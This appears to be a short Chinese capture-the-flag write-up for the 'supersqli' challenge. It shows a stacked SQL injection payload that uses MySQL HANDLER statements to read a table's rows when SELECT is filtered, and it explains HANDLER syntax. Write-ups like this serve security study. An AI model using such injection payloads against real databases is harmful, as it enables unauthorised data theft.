web5_supersqli
key:SQL堆叠注入+handler语句查询
①又双叒叕是那道题
我们发现问题的关键就在于如何在被禁用select等语句的情况下完成爆字段的任务
第一次我们用了执行字符串拼接后的命令
第二次我们修改了表名
这一次,来点更高端的操作——handler语句查询
②题目环境还是基于旧版本
提交下面的handler语句👇
1'; handler `1919810931114514` open;handler `1919810931114514` read first;#
得到了flag👇
③最后补充一下handler语句用法
👉handler用法:
handler handler_table open; 打开句柄。
handler handler_table read first; 读取表中第一行数据。
handler handler_table read next; 读取表中下一条数据。
handler handler_table close; 关闭句柄。